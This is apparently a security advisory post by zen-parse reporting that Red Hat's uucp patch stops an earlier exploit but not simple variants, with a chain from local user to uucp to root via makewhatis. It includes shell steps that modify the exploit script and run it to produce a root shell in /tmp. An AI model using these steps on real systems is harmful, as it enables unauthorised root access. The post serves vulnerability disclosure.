Problem: uucp patch from RedHat (possibly others) prevents
original exploit, but not variations.
Severity: Potential for local root on some distributions,
uucp.uucp on others.
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466
I had seen this report some time ago, and thought: "Good. They've got a
bug report. That'll get it fixed. They'll check that before they release a
new version, at least."
They didn't.
The patch does prevent the original exploit from working.
However, a trivial patch to the exploit I posted makes it work again.
local user -> uucp (via this problem) -> root (on some distributions, via
/usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
issue.)
$ cd redhat7.0-uucp-to-root
$ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
$ mv tmp-exp-erm.sh exp-erm.sh
$ ./runme
and wait for /tmp/rootshell to appear.
(Does anyone at RedHat actually read their bugzilla posts? Might it not be
an idea to make anything flagged as security actually get looked at by
someone? 2001-10-09 seems along time for that to go unnoticed.)
-- zen-parse
--
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it
may be redistributed without modification.
2) In any other case the contents of this message is confidential and not
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
